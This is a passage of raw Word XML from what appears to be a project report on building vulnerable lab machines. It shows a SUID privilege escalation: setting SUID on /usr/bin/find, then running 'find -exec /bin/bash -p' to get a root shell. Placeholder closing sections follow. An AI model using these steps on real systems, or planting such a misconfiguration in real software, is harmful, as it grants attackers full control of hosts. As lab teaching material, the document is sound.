            <wp:effectExtent l="0" t="0" r="0" b="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67350" cy="5130800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C42B50" w14:textId="1B2280B6" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t>There are few interesting binary files that ha</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t>ve</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> SUID permission</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t>s.</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> one of th</w:t>
      </w:r>
      <w:r w:rsidR="006B7F40">
        <w:t>ese</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> is /usr/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BE8170" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Any suid permission can be configured by the server administrator using the command </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00987876" w:rsidRPr="00987876" w14:paraId="764F4056" w14:textId="77777777" w:rsidTr="00987876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62789CAC" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="481F5D68" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>chmod u+s /usr/bin/find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5964101D" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876"/>
    <w:p w14:paraId="6ECAFF86" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve">www-data have privilege to work on the /var/www/html directory, he can create a file with touch </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00987876" w:rsidRPr="00987876" w14:paraId="11CB5FD9" w14:textId="77777777" w:rsidTr="00987876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CB9B375" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B269266" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>touch escalate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4228C6FF" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876"/>
    <w:p w14:paraId="31670333" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t>then using the find command to find the file(“escalate”) just created, the command find has the option -exec that will execute the next command if the file is found. As the find is set as SUID the -exec option will run as root</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00987876" w:rsidRPr="00987876" w14:paraId="0A5540C3" w14:textId="77777777" w:rsidTr="00987876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57F277D8" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BEC7BC7" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>find escalate -exec whoami \;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A2268D" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876"/>
    <w:p w14:paraId="7EAD9B0D" w14:textId="189DB4CF" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D5E1F2" wp14:editId="5E08F4A1">
            <wp:extent cx="4362450" cy="1130300"/>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62450" cy="1130300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65224BE3" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve">The output is root, however only the command execute is root, the attacker still running a shell as a www-data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC64191" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t>When the attacker uses as the parameter of the exec command /bin/bash -p is asking the user root to open a new /bin/bash shell and to running as the user executing the command therefore root.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00987876" w:rsidRPr="00987876" w14:paraId="57882001" w14:textId="77777777" w:rsidTr="00987876">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23CE4C6B" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C565859" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00987876">
              <w:t>find escalate -exec /bin/bash -p \;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C409FC1" w14:textId="77777777" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876"/>
    <w:p w14:paraId="763D7D56" w14:textId="4EF02780" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D49C63A" wp14:editId="3C20BC9A">
            <wp:extent cx="4552950" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>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52950" cy="774700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE3E5C" w14:textId="7C3C1ADB" w:rsidR="00987876" w:rsidRPr="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve">The privilege escalation is completed and successful, the attacker has </w:t>
      </w:r>
      <w:r w:rsidR="00452CDE">
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="00452CDE">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> a /bin/bash shell as root and can ha</w:t>
      </w:r>
      <w:r w:rsidR="00452CDE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t xml:space="preserve"> full control of the </w:t>
      </w:r>
      <w:r w:rsidR="00452CDE">
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidRPr="00987876">
        <w:t>system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC7DF9B" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r>
        <w:t>REVIEWED BY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF94CB" w14:textId="31B23CCF" w:rsidR="00987876" w:rsidRDefault="00BC0215" w:rsidP="00987876">
      <w:r>
        <w:t>David Black</w:t>
      </w:r>
      <w:r w:rsidR="00987876">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC0DA1" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r>
        <w:t>REVIEW OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9027BF" w14:textId="77777777" w:rsidR="00987876" w:rsidRDefault="00987876" w:rsidP="00987876">
      <w:r>
        <w:t xml:space="preserve">Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB45B6" w14:textId="200DD76C" w:rsidR="00B56C0A" w:rsidRDefault="00B56C0A" w:rsidP="00384B9F"/>
    <w:p w14:paraId="4E0E171C" w14:textId="0D9974F3" w:rsidR="0083712C" w:rsidRDefault="0083712C" w:rsidP="00384B9F"/>
    <w:p w14:paraId="532857B5" w14:textId="4DB994E4" w:rsidR="0083712C" w:rsidRDefault="0083712C" w:rsidP="00384B9F"/>
    <w:p w14:paraId="6391DC5F" w14:textId="6DC017C7" w:rsidR="0083712C" w:rsidRDefault="0083712C" w:rsidP="00384B9F"/>
    <w:p w14:paraId="7D5D2360" w14:textId="79232444" w:rsidR="0083712C" w:rsidRDefault="0083712C" w:rsidP="00384B9F"/>
    <w:p w14:paraId="5433316C" w14:textId="77777777" w:rsidR="0083712C" w:rsidRPr="00606117" w:rsidRDefault="0083712C" w:rsidP="00384B9F"/>
    <w:p w14:paraId="346FBF45" w14:textId="646373BA" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00641976" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00606117" w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: FINAL TESTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3D981" w14:textId="30D95DAA" w:rsidR="00606117" w:rsidRPr="006C4E45" w:rsidRDefault="0083712C" w:rsidP="00606117">
      <w:r w:rsidRPr="006C4E45">
        <w:t xml:space="preserve">~~~~~~To be completed once all vulnerabilities are </w:t>
      </w:r>
      <w:r w:rsidR="006C4E45" w:rsidRPr="006C4E45">
        <w:t xml:space="preserve">implemented into the master </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4E45" w:rsidRPr="006C4E45">
        <w:t>vms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4E45" w:rsidRPr="006C4E45">
        <w:t xml:space="preserve"> (waiting on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4E45" w:rsidRPr="006C4E45">
        <w:t>log4j</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4E45" w:rsidRPr="006C4E45">
        <w:t>)~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E09812C" w14:textId="4774189F" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00641976" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00606117" w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDC612" w14:textId="08DE0B63" w:rsidR="00606117" w:rsidRPr="006C4E45" w:rsidRDefault="00410D42" w:rsidP="00606117">
      <w:r>
        <w:t>~~~~~~~~~ We are awesome….big cuddles all round. ~~~~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD5D4A" w14:textId="20F81723" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: APPENDICES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102AE2C" w14:textId="51B146CC" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1: PROJECT HEALTH REGISTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00165207" w14:textId="3477FF2C" w:rsidR="00CA3121" w:rsidRPr="006C4E45" w:rsidRDefault="006C4E45" w:rsidP="00606117">
      <w:r>
        <w:t>~~~~~</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4E45">
        <w:t>Final health register</w:t>
      </w:r>
      <w:r>
        <w:t>~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE07DB7" w14:textId="69BEF018" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C04030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.2: LESSONS LEARNED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31918B07" w14:textId="2F64D271" w:rsidR="00CA3121" w:rsidRPr="006C4E45" w:rsidRDefault="006C4E45" w:rsidP="00606117">
      <w:r>
        <w:t xml:space="preserve">how arisen issues were handled and approach amended to mitigate. What we would do different in a future project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543A401" w14:textId="3B8B6B19" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C04030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.3: PEER REVIEW </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316731AC" w14:textId="5545668F" w:rsidR="00CA3121" w:rsidRPr="006C4E45" w:rsidRDefault="006C4E45" w:rsidP="00606117">
      <w:r>
        <w:t>~~~~~~~~~~Review of final closure report by some other PM~~~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC37D5" w14:textId="1C3FEB36" w:rsidR="00606117" w:rsidRPr="00CA3121" w:rsidRDefault="00606117" w:rsidP="00606117">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C04030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3121">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.4: CLIENT SIGN-OFF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B140656" w14:textId="0CB8D4DE" w:rsidR="00CA3121" w:rsidRDefault="006C4E45" w:rsidP="00606117">
      <w:r>
        <w:t>~~~~Final client satisfaction survey~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1F47D" w14:textId="6BC6E2D4" w:rsidR="006C4E45" w:rsidRPr="006C4E45" w:rsidRDefault="006C4E45" w:rsidP="00606117">
      <w:r>
        <w:t>~~~~sign-off on delivered product~~~~~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E90B5AB" w14:textId="12FA4B62" w:rsidR="00606117" w:rsidRPr="00C04030" w:rsidRDefault="00C04030" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04030">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11: REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299ADDB9" w14:textId="77777777" w:rsidR="00022BA6" w:rsidRDefault="00022BA6" w:rsidP="00022BA6"/>
    <w:sectPr w:rsidR="00022BA6" w:rsidSect="00AC5263">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736B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3788E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642B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBFC7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507278D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0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759E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20C69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C0E25BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D0C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FC5AD5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B9CC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507F72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F36B3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2CC6DAB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FCAAE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A7B48E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B2AB0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779B5531"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DB8B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316C9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="417476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0"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="4"/>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BA6"/>
    <w:rsid w:val="00022BA6"/>
    <w:rsid w:val="000602E7"/>
    <w:rsid w:val="00100DA1"/>
    <w:rsid w:val="00151E57"/>
    <w:rsid w:val="0018174B"/>
    <w:rsid w:val="00246E1B"/>
    <w:rsid w:val="002962B0"/>
    <w:rsid w:val="002E43AE"/>
    <w:rsid w:val="002E52BB"/>
    <w:rsid w:val="003001C2"/>
    <w:rsid w:val="00306832"/>
    <w:rsid w:val="00313AEF"/>
    <w:rsid w:val="00327178"/>
    <w:rsid w:val="00337397"/>
    <w:rsid w:val="00384B9F"/>
    <w:rsid w:val="00410D42"/>
    <w:rsid w:val="00452CDE"/>
    <w:rsid w:val="004564E8"/>
    <w:rsid w:val="00457DCA"/>
    <w:rsid w:val="00464245"/>
    <w:rsid w:val="004E22EB"/>
    <w:rsid w:val="005104F7"/>
    <w:rsid w:val="00511070"/>
    <w:rsid w:val="005645A0"/>
    <w:rsid w:val="00606117"/>
    <w:rsid w:val="0061422E"/>
